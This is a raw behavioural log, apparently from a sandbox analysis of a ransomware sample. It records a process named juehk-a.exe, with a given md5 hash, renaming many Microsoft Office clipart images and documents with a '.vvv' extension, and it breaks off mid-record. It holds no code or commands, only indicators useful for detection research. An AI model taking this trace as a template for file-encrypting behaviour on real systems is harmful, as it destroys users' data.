- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.vvv
- ads:
- fid (ads:): 562949953498445
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97548
- mode: rename
- sequenceNumber: 2209
- filesize: 101486
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.vvv
- ads:
- fid (ads:): 562949953498446
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97565
- mode: rename
- sequenceNumber: 2210
- filesize: 114846
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG.vvv
- ads:
- fid (ads:): 562949953498447
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97579
- mode: rename
- sequenceNumber: 2211
- filesize: 98190
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG.vvv
- ads:
- fid (ads:): 562949953498448
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97596
- mode: rename
- sequenceNumber: 2212
- filesize: 113838
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG.vvv
- ads:
- fid (ads:): 562949953498449
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97611
- mode: rename
- sequenceNumber: 2213
- filesize: 100910
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG.vvv
- ads:
- fid (ads:): 562949953498450
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97627
- mode: rename
- sequenceNumber: 2214
- filesize: 93870
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG.vvv
- ads:
- fid (ads:): 562949953498451
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97642
- mode: rename
- sequenceNumber: 2215
- filesize: 112894
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG.vvv
- ads:
- fid (ads:): 562949953498452
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97656
- mode: rename
- sequenceNumber: 2216
- filesize: 96574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG.vvv
- ads:
- fid (ads:): 562949953498453
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97672
- mode: rename
- sequenceNumber: 2217
- filesize: 89406
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG.vvv
- ads:
- fid (ads:): 562949953498454
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97685
- mode: rename
- sequenceNumber: 2218
- filesize: 103054
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG.vvv
- ads:
- fid (ads:): 562949953498455
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97699
- mode: rename
- sequenceNumber: 2219
- filesize: 97566
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG.vvv
- ads:
- fid (ads:): 562949953498456
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97713
- mode: rename
- sequenceNumber: 2220
- filesize: 82398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG.vvv
- ads:
- fid (ads:): 562949953498457
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97741
- mode: rename
- sequenceNumber: 2221
- filesize: 55966
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG.vvv
- ads:
- fid (ads:): 562949953498458
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97753
- mode: rename
- sequenceNumber: 2222
- filesize: 71982
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG.vvv
- ads:
- fid (ads:): 562949953498459
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97765
- mode: rename
- sequenceNumber: 2223
- filesize: 31262
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG.vvv
- ads:
- fid (ads:): 562949953498460
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97779
- mode: rename
- sequenceNumber: 2224
- filesize: 43710
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG.vvv
- ads:
- fid (ads:): 562949953498461
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97794
- mode: rename
- sequenceNumber: 2225
- filesize: 15598
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG.vvv
- ads:
- fid (ads:): 562949953498462
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97807
- mode: rename
- sequenceNumber: 2226
- filesize: 15118
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG.vvv
- ads:
- fid (ads:): 562949953498463
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97821
- mode: rename
- sequenceNumber: 2227
- filesize: 27358
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.vvv
- ads:
- fid (ads:): 562949953498464
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97836
- mode: rename
- sequenceNumber: 2228
- filesize: 52398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG.vvv
- ads:
- fid (ads:): 562949953498465
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97850
- mode: rename
- sequenceNumber: 2229
- filesize: 28302
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG.vvv
- ads:
- fid (ads:): 562949953498466
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97864
- mode: rename
- sequenceNumber: 2230
- filesize: 39534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG.vvv
- ads:
- fid (ads:): 562949953498467
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97879
- mode: rename
- sequenceNumber: 2231
- filesize: 47966
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG.vvv
- ads:
- fid (ads:): 562949953498468
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97893
- mode: rename
- sequenceNumber: 2232
- filesize: 39566
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG.vvv
- ads:
- fid (ads:): 562949953498469
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97907
- mode: rename
- sequenceNumber: 2233
- filesize: 32670
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG.vvv
- ads:
- fid (ads:): 562949953498470
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97920
- mode: rename
- sequenceNumber: 2234
- filesize: 14014
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG.vvv
- ads:
- fid (ads:): 562949953498471
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97937
- mode: rename
- sequenceNumber: 2235
- filesize: 203310
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG.vvv
- ads:
- fid (ads:): 562949953498472
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97952
- mode: rename
- sequenceNumber: 2236
- filesize: 89838
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG.vvv
- ads:
- fid (ads:): 562949953498473
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97969
- mode: rename
- sequenceNumber: 2237
- filesize: 125406
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG.vvv
- ads:
- fid (ads:): 562949953498474
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97983
- mode: rename
- sequenceNumber: 2238
- filesize: 105470
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.vvv
- ads:
- fid (ads:): 562949953498475
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97996
- mode: rename
- sequenceNumber: 2239
- filesize: 96494
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.vvv
- ads:
- fid (ads:): 562949953498476
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98035
- mode: rename
- sequenceNumber: 2240
- filesize: 136030
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG.vvv
- ads:
- fid (ads:): 562949953498991
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98047
- mode: rename
- sequenceNumber: 2241
- filesize: 41902
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG.vvv
- ads:
- fid (ads:): 562949953498992
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98058
- mode: rename
- sequenceNumber: 2242
- filesize: 6750
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG.vvv
- ads:
- fid (ads:): 562949953498993
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98070
- mode: rename
- sequenceNumber: 2243
- filesize: 7742
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG.vvv
- ads:
- fid (ads:): 562949953498994
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98081
- mode: rename
- sequenceNumber: 2244
- filesize: 6414
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG.vvv
- ads:
- fid (ads:): 562949953498997
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98093
- mode: rename
- sequenceNumber: 2245
- filesize: 40030
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG.vvv
- ads:
- fid (ads:): 562949953499005
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98110
- mode: rename
- sequenceNumber: 2246
- filesize: 18110
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG.vvv
- ads:
- fid (ads:): 562949953499006
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98122
- mode: rename
- sequenceNumber: 2247
- filesize: 27806
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG.vvv
- ads:
- fid (ads:): 562949953499009
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98133
- mode: rename
- sequenceNumber: 2248
- filesize: 29758
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG.vvv
- ads:
- fid (ads:): 562949953499012
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98152
- mode: rename
- sequenceNumber: 2249
- filesize: 3966
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.vvv
- ads:
- fid (ads:): 562949953499019
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98163
- mode: rename
- sequenceNumber: 2250
- filesize: 34366
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG.vvv
- ads:
- fid (ads:): 562949953499024
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98185
- mode: rename
- sequenceNumber: 2251
- filesize: 41598
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG.vvv
- ads:
- fid (ads:): 562949953499049
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98196
- mode: rename
- sequenceNumber: 2252
- filesize: 51070
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG.vvv
- ads:
- fid (ads:): 562949953499050
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98208
- mode: rename
- sequenceNumber: 2253
- filesize: 62942
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG.vvv
- ads:
- fid (ads:): 562949953499051
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98219
- mode: rename
- sequenceNumber: 2254
- filesize: 15854
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG.vvv
- ads:
- fid (ads:): 562949953499053
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98231
- mode: rename
- sequenceNumber: 2255
- filesize: 31310
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG.vvv
- ads:
- fid (ads:): 562949953499057
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98242
- mode: rename
- sequenceNumber: 2256
- filesize: 30206
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG.vvv
- ads:
- fid (ads:): 562949953499058
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98253
- mode: rename
- sequenceNumber: 2257
- filesize: 42222
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.vvv
- ads:
- fid (ads:): 562949953499059
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98265
- mode: rename
- sequenceNumber: 2258
- filesize: 42478
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG.vvv
- ads:
- fid (ads:): 562949953499060
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98276
- mode: rename
- sequenceNumber: 2259
- filesize: 11598
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG.vvv
- ads:
- fid (ads:): 562949953499061
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98286
- mode: rename
- sequenceNumber: 2260
- filesize: 13246
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG.vvv
- ads:
- fid (ads:): 562949953499062
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98298
- mode: rename
- sequenceNumber: 2261
- filesize: 48974
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.vvv
- ads:
- fid (ads:): 562949953499063
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98430
- mode: rename
- sequenceNumber: 2262
- filesize: 606
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\DataServices\+Connect to New Data Source.odc
- new_name: C:\Program Files\Microsoft Office\Office15\1033\DataServices\+Connect to New Data Source.odc.vvv
- ads:
- fid (ads:): 5066549580849863
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98443
- mode: rename
- sequenceNumber: 2263
- filesize: 622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\DataServices\+NewSQLServerConnection.odc
- new_name: C:\Program Files\Microsoft Office\Office15\1033\DataServices\+NewSQLServerConnection.odc.vvv
- ads:
- fid (ads:): 562949953496020
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98496
- mode: rename
- sequenceNumber: 2264
- filesize: 20398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.DOC
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.DOC.vvv
- ads:
- fid (ads:): 562949953496313
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98522
- mode: rename
- sequenceNumber: 2265
- filesize: 12718
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.PPT
